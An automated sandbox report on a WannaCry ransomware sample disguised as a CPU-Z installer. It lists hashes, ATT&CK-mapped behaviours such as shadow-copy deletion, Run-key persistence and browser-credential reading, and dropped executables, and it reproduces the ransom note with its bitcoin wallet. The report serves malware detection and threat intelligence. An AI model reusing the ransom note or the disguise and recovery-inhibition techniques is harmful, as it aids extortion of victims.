wannacry | 1d8f96a860660bec0fef1ca16310aad2d6a594677a411e53a2dde7cef0fe118b

Analysis

max time kernel
1800s
max time network
1689s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
03-08-2024 02:01

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

cpu-z_2.10-en.exe
Size

3.4MB
MD5

00316d169a174907a5f4337614e919e8
SHA1

17e77563c410c46c9c187983e2b22a8d4cc61d17
SHA256

1d8f96a860660bec0fef1ca16310aad2d6a594677a411e53a2dde7cef0fe118b
SHA512

fd38967ef01b4b45b798baabee891d5ee2e3548b37b011b85df1c07c7b748fcd5fe281e4d9e2b32b32311b7ffa57f77d0557830752a1a927bb9aa5dd4fe01824
SSDEEP

49152:0wREDcHlUNOSYLdmnK2ymi7DhnzCiVIvzG+AzsomXxR8CAEGqO9Gpv0t7djR:0wRE1ELLdmt4xnzbVIL4ifBUvkv0Lj

Score

10^/10

wannacry defense_evasion discovery execution impact persistence ransomware spyware stealer upx worm

Malware Config

Extracted

Path

C:\Users\Admin\Downloads\@[email protected]

Family

wannacry

Ransom Note

Q: What's wrong with my files? A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted. If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely! Let's start decrypting! Q: What do I do? A: First, you need to pay service fees for the decryption. Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn Next, please find an application file named "@[email protected]". It is the decrypt software. Run and follow the instructions! (You may need to disable your antivirus for a while.) Q: How can I trust? A: Don't worry about decryption. We will decrypt your files surely because nobody will trust us if we cheat users. * If you need our assistance, send a message by clicking <Contact Us> on the decryptor window. �

Wallets

115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn

Signatures

Wannacry
WannaCry is a ransomware cryptoworm.
ransomware worm wannacry
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047

Drops startup file 2 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\~SDFDCE.tmp	WannaCry.EXE
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SDFDB7.tmp	WannaCry.EXE

Modifies file permissions 1 TTPs 1 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
5564	icacls.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 9 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x00040000000154f8-6053.dat	upx
behavioral1/memory/7496-6081-0x0000000000400000-0x0000000000454000-memory.dmp	upx
behavioral1/memory/7496-6083-0x0000000000400000-0x0000000000454000-memory.dmp	upx
behavioral1/memory/716-6105-0x0000000000400000-0x0000000000454000-memory.dmp	upx
behavioral1/memory/7696-6124-0x0000000000400000-0x0000000000454000-memory.dmp	upx
behavioral1/files/0x0005000000015506-6215.dat	upx
behavioral1/memory/3900-6225-0x0000000000400000-0x0000000000409000-memory.dmp	upx
behavioral1/memory/3900-6252-0x0000000000400000-0x0000000000409000-memory.dmp	upx
behavioral1/memory/7280-6253-0x0000000000400000-0x0000000000409000-memory.dmp	upx

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\svgirwyi764 = "\"C:\\Users\\Admin\\Downloads\\tasksche.exe\""	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\~~CB = "cb.exe"	ColorBug.exe

Downloads MZ/PE file
File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
defense_evasion

Windows File and Directory Permissions Modification
T1222.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service

T1102

flow	ioc
317	camo.githubusercontent.com
318	camo.githubusercontent.com
328	raw.githubusercontent.com
329	raw.githubusercontent.com

Sets desktop wallpaper using registry 2 TTPs 2 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]"	@[email protected]
Set value (str)	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]"	WannaCry.EXE

Drops file in Windows directory 8 IoCs

description	ioc	Process
File created	C:\Windows\rescache\_merged\3720402701\1568373884.pri	MicrosoftEdge.exe
File created	C:\Windows\rescache\_merged\3720402701\1568373884.pri	MicrosoftEdgeCP.exe
File created	C:\Windows\rescache\_merged\3720402701\1568373884.pri	MicrosoftEdgeCP.exe
File created	C:\Windows\rescache\_merged\3720402701\1568373884.pri	MicrosoftEdgeCP.exe
File created	C:\Windows\rescache\_merged\3720402701\1568373884.pri	MicrosoftEdgeCP.exe
File created	C:\Windows\rescache\_merged\3720402701\1568373884.pri	MicrosoftEdgeCP.exe
File created	C:\Windows\rescache\_merged\3720402701\1568373884.pri	MicrosoftEdgeCP.exe
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe

Executes dropped EXE 64 IoCs

pid	Process
1204	cpu-z_2.10-en.tmp
632	WannaCry.EXE
2868	taskdl.exe
5540	@[email protected]
3952	@[email protected]
3828	taskhsvc.exe
7080	taskdl.exe
5232	taskse.exe
3396	@[email protected]
5876	taskdl.exe
3652	taskse.exe
3724	@[email protected]
6880	taskse.exe
6660	@[email protected]
6296	taskdl.exe
6744	taskse.exe
3652	@[email protected]
5212	taskdl.exe
7496	ArcticBomb.exe
716	ArcticBomb.exe
3724	ArcticBomb.exe
7060	ArcticBomb.exe
7696	ArcticBomb.exe
7764	taskse.exe
6392	@[email protected]
7780	taskdl.exe
3900	BlueScreen.exe
6256	taskse.exe
6444	@[email protected]
4816	taskdl.exe
7280	BlueScreen.exe
4380	taskse.exe
7060	@[email protected]
4608	taskdl.exe
1388	ColorBug.exe
7880	ColorBug.exe
8132	DesktopPuzzle.exe
8156	taskse.exe
8172	@[email protected]
6620	taskdl.exe
3312	taskse.exe
7180	@[email protected]
2124	taskdl.exe
7392	taskse.exe
7244	@[email protected]
7272	taskdl.exe
7496	taskse.exe
7064	@[email protected]
7216	taskdl.exe
7652	taskse.exe
7644	@[email protected]
7908	taskdl.exe
1792	taskse.exe
2316	@[email protected]
6976	taskdl.exe
7796	taskse.exe
1100	@[email protected]
6796	taskdl.exe
8020	taskse.exe
7892	@[email protected]
8032	taskdl.exe
8096	taskse.exe
6584	@[email protected]
7316	taskdl.exe

Loads dropped DLL 7 IoCs

pid	Process
3828	taskhsvc.exe
3828	taskhsvc.exe
3828	taskhsvc.exe
3828	taskhsvc.exe
3828	taskhsvc.exe
3828	taskhsvc.exe
3828	taskhsvc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cpu-z_2.10-en.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BlueScreen.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	DesktopPuzzle.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ArcticBomb.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cpu-z_2.10-en.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskhsvc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WannaCry.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cscript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BlueScreen.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	vssadmin.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ColorBug.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]

Checks processor information in registry 2 TTPs 13 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe

Enumerates system info in registry 2 TTPs 9 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe

Interacts with shadow copies 3 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

T1490

Direct Volume Access

T1006

pid	Process
6436	vssadmin.exe

Modifies Control Panel 42 IoCs

evasion

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Control Panel\Colors\MenuText = "173 16 229"	ColorBug.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Control Panel\Colors\ActiveBorder = "18 188 71"	ColorBug.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Control Panel\Colors\Scrollbar = "198 138 63"	ColorBug.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Control Panel\Colors\MenuText = "194 249 30"	ColorBug.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Control Panel\Colors\TitleText = "134 43 81"	ColorBug.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Control Panel\Colors\ButtonShadow = "157 1 224"	ColorBug.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Control Panel\Colors\Menu = "127 215 8"	ColorBug.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Control Panel\Colors\ButtonFace = "114 216 174"	ColorBug.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Control Panel\Colors\GrayText = "103 36 77"	ColorBug.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Control Panel\Colors\InactiveBorder = "167 143 150"	ColorBug.exe
Key created	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Control Panel\Colors	ColorBug.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Control Panel\Colors\ActiveTitle = "255 223 131"	ColorBug.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Control Panel\Colors\InactiveTitle = "184 103 222"	ColorBug.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Control Panel\Colors\Menu = "86 136 73"	ColorBug.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Control Panel\Colors\Window = "232 183 64"	ColorBug.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Control Panel\Colors\AppWorkspace = "30 239 123"	ColorBug.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Control Panel\Colors\Background = "218 186 163"	ColorBug.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Control Panel\Colors\WindowText = "167 3 56"	ColorBug.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Control Panel\Colors\AppWorkspace = "49 16 125"	ColorBug.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Control Panel\Colors\WindowText = "66 160 180"	ColorBug.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Control Panel\Colors\Hilight = "159 125 40"	ColorBug.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Control Panel\Colors\HilightText = "94 150 51"	ColorBug.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Control Panel\Colors\WindowFrame = "134 130 209"	ColorBug.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Control Panel\Colors\Hilight = "232 56 55"	ColorBug.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Control Panel\Colors\ButtonText = "53 38 213"	ColorBug.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Control Panel\Colors\InactiveTitleText = "113 6 204"	ColorBug.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Control Panel\Colors\Scrollbar = "80 250 47"	ColorBug.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Control Panel\Colors\ActiveTitle = "82 62 185"	ColorBug.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Control Panel\Colors\Window = "216 202 19"	ColorBug.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Control Panel\Colors\TitleText = "97 55 233"	ColorBug.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Control Panel\Colors\ButtonText = "87 29 118"	ColorBug.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Control Panel\Colors\WindowFrame = "149 229 186"	ColorBug.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Control Panel\Colors\ActiveBorder = "198 103 71"	ColorBug.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Control Panel\Colors\ButtonFace = "51 140 118"	ColorBug.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Control Panel\Colors\InactiveTitle = "115 247 38"	ColorBug.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Control Panel\Colors\HilightText = "85 105 168"	ColorBug.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Control Panel\Colors\ButtonShadow = "50 237 89"	ColorBug.exe
Key created	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Control Panel\Colors	ColorBug.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Control Panel\Colors\Background = "141 20 173"	ColorBug.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Control Panel\Colors\GrayText = "60 223 1"	ColorBug.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Control Panel\Colors\InactiveBorder = "107 104 131"	ColorBug.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Control Panel\Colors\InactiveTitleText = "151 108 57"	ColorBug.exe

Modifies Internet Explorer settings 1 TTPs 2 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe
Key created	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdgeCP.exe

Modifies data under HKEY_USERS 4 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133671242886907913"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe

Modifies registry class 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\MrtCache	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\002\Internet Explorer\DOMStorage\Total\ = "321"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Explorer\Main	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\002\Internet Explorer\DOMStorage\bing.com\NumberOfSubdomains = "1"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active\{4C06CC9F-FF4A-4339-9EB6-44D26A871791} = "0"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = ffa2d65249e5da01	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\002\Internet Explorer\EdpDomStorage\Total	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\002\Internet Explorer\EdpDomStorage\www.bing.com	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\002\Internet Explorer\EdpDomStorage\www.bing.com\ = "0"	MicrosoftEdgeCP.exe
